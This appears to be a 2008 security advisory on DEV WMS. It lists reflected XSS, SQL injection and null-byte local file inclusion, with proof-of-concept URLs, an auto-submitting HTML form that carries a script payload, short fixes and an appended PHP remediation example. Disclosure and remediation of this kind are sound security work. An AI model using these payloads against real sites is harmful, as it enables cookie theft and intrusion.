DEV WMS Multiple Vulnerabilities

2008.07.31
Risk: High
Local: No
Remote: No
CVE: N/A
CWE: N/A

----------------------------------------------------------------
Script : DEV WMS
Type : Multiple Vulnerabilities ( Local file inclusion / Cross Site Scripting / SQL Injection )
Alert : High
----------------------------------------------------------------
Discovered by : Khashayar Fereidani Or Dr.Crash
My Website : http://FEREIDANI.IR
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com
----------------------------------------------------------------
Script Download : http://dev-wms.sourceforge.net/
----------------------------------------------------------------
XSS Vulnerability 1 :
Variable Sent Method : GET
Vulnerable Variable : session
Address : http://Example.com/?session=">><>><script>alert(document.cookie)</script>
Solution : Filter the session variable with the htmlspecialchars() function ...
----------------------------------------------------------------
XSS Vulnerability 2 :
Variable Sent Method : POST
Vulnerable Variable : kluc
Address : http://Example.com/index.php?session=0&action=search

Change example.com to the script address on a real site, save as ircrash.html, open the file in a browser and see your cookie.

<html>
<head></head>
<body onLoad=javascript:document.form.submit()>
<form action="http://Example.com/index.php?session=0&action=search" method="POST" name="form">
<form method="post" onSubmit="return validateprm(this)"><input type="hidden" name="prip" value="true"/><input type="hidden" name="action" value="search"/>
<input type="hidden" name="kluc" value="&#34&#39&#39&#39&#60&#62&#62&#62&#62<script>alert('xss')</script>">
</form>
</body>
</html>

Solution : Filter the kluc variable with the htmlspecialchars() function ...
----------------------------------------------------------------
SQL Injection :
Method Of Send : GET
Vulnerable Variable : article
Address : http://Example.com/index.php?session=0&action=read&click=open&article=[SQL CODE]
Solution : Filter dangerous characters in the article variable ...
----------------------------------------------------------------
Local file inclusion :
Method Of Send : GET
Vulnerable Variable : step
Address : http://Example.com/admin/index.php?start=install&step=file.type%00
Solution : Filter the step variable with an if statement ...
----------------------------------------------------------------
Tnx : God
http://IRCRASH.COM
----------------------------------------------------------------
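
The four "Solution" lines above, sketched as an added PHP example that is not part of the original advisory and is not DEV WMS code. The helper names, the articles table and the install step names are hypothetical, and the demo at the end assumes the pdo_sqlite extension.

```php
<?php
declare(strict_types=1);
// Added example: helper names, table layout and step names are hypothetical,
// not taken from DEV WMS.

// session / kluc: encode at output so quotes and angle brackets stay inert.
function html_out(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// article: accept a positive integer only; everything else is rejected.
function article_id(string $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// article: bind the validated id instead of concatenating it into the query.
function fetch_article(PDO $db, int $id): ?array
{
    $stmt = $db->prepare('SELECT id, title FROM articles WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// step: map the request value to a fixed file; user input never forms a path.
const INSTALL_STEPS = [
    'license'  => 'steps/license.php',
    'database' => 'steps/database.php',
];

function install_step_file(string $raw): ?string
{
    return INSTALL_STEPS[$raw] ?? null;
}

// Constructed inputs shaped like the request values in the advisory.
$db = new PDO('sqlite::memory:'); // assumes the pdo_sqlite extension
$db->exec('CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO articles (id, title) VALUES (1, 'Hello')");

echo html_out('"><script>alert(document.cookie)</script>'), "\n";
var_dump(article_id('1 OR 1=1'));              // rejected before any query runs
var_dump(fetch_article($db, article_id('1')));
var_dump(install_step_file("file.type\0"));    // not in the allowlist
var_dump(install_step_file('database'));
```

Encoding belongs at every point where session or kluc is echoed back, and the allowlist lookup replaces any include path built from step, so a trailing NUL byte has nothing to truncate.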

References:

http://seclists.org/bugtraq/2008/Jul/0288.html

